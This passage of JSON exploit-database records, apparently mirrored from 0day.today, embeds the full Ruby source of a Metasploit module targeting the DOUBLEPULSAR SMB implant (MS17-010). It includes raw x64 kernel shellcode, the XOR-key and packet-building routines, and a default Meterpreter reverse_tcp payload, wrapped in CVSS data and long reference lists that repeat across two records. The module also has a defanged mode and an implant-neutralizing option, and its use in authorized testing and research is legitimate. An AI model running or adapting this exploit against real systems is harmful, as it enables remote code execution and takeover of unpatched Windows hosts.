"kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-29T22:25:08", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-29T22:25:08", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-30] #"}, "lastseen": "2021-09-29T22:25:08", "differentElements": ["sourceData"], "edition": 30}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "f2afc28b3a81c3976677b3793e68ebcc", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant by sending it the kill opcode. Note that the module ships with the advanced option DefangedMode enabled, in which case it aborts with a warning that executing code against a nation-state implant may contaminate forensic evidence; the option must be explicitly disabled to proceed. Payload execution is only supported against x64 targets (the implant is still detected on x86 hosts, but the module refuses to run the payload there), and the exploit always re-runs its check first because the XOR key and tree ID recovered from the implant's ping response are required.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-01T00:17:03", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:42030"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27613", 
"1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-29T22:25:08", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-29T22:25:08", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires 
